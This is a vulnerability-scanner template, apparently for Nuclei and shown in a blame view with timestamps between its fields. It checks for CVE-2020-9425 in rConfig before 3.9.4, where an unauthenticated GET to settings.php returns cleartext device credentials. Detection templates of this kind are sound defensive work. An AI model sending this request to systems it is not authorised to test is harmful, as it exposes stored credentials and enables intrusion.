2021-02-14 19:43:33 +00:00
id : CVE-2020-9425
2022-04-22 10:38:41 +00:00
2021-02-14 19:43:33 +00:00
info :
2022-06-27 18:23:05 +00:00
name : rConfig <3.9.4 - Sensitive Information Disclosure
2021-02-14 19:43:33 +00:00
author : madrobot
severity : high
2022-06-27 18:23:05 +00:00
description : rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
2021-08-18 11:37:49 +00:00
reference :
2021-03-24 06:56:49 +00:00
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
2022-06-27 18:23:05 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-9425
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-9425
cwe-id : CWE-670
2022-06-28 03:05:28 +00:00
tags : cve,cve2020,rconfig.exposure
2021-02-14 19:43:33 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/settings.php"
2022-06-28 03:05:28 +00:00
2021-02-14 19:43:33 +00:00
matchers-condition : and
matchers :
2022-06-28 03:05:28 +00:00
2021-02-14 19:43:33 +00:00
- type : word
2022-06-28 03:05:28 +00:00
part : body
2021-02-14 19:43:33 +00:00
words :
- "defaultNodeUsername"
- "defaultNodePassword"
2021-02-15 19:05:52 +00:00
condition : and
2022-06-28 03:05:28 +00:00
- type : status
status :
- 200
2022-06-27 18:23:05 +00:00
# Enhanced by mp on 2022/06/27